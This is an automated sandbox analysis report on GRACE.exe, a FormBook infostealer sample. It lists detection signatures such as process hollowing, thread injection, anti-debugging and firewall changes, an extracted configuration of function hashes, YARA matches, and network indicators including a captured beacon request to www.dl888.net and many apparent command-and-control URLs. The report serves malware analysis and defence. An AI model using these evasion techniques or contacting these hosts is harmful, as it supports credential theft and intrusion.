Analysis Report GRACE.exe

Overview

General Information

Sample Name: GRACE.exe
Analysis ID: 344817
MD5: 9034acbb2742281523525d715a4ee566
SHA1: 605948c4bcd7a0290e46a37d841a09ab43fbec86
SHA256: cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
Tags: COVID-19Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 10.2.AddInProcess32.exe.400000.0.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for submitted file
Source: GRACE.exe Virustotal: Detection: 62% Perma Link
Source: GRACE.exe Metadefender: Detection: 16% Perma Link
Source: GRACE.exe ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: GRACE.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 10.2.AddInProcess32.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: GRACE.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: GRACE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE6640
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE82D8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_06CE7380
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7380
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then jmp 06CE2656h 0_2_06CE1E89
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov esp, ebp 0_2_06CEDF0A
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then xor edx, edx 0_2_06CE72AC
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then xor edx, edx 0_2_06CE72B8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE937F
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_06CE7374
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7374
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_06CE7054
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7054
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_06CE7060
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7060
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE6B7C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416BF3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C27
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00417D68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16BF3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C27
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D17D68

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1Host: www.dl888.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: global traffic HTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1Host: www.dl888.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.dl888.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1308Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Wed, 27 Jan 2021 06:58:37 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7
Source: explorer.exe, 00000010.00000003.552552225.000000000F704000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobj
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com/jqc/www.luxusgrotte.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net/jqc/www.hongreng.xyz
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.netReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com/jqc/www.szyulics.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz/jqc/www.hotvidzhub.download
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyzReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download/jqc/www.kornteengoods.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.downloadReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com/jqc/www.registeredagentfirm.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net/jqc/www.fitdramas.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.netReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com/jqc/www.ludisenofloral.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com/jqc/www.11sxsx.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com/jqc/www.sterlworldshop.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com/jqc/www.quintred.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com/jqc/www.kimberlygoedhart.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
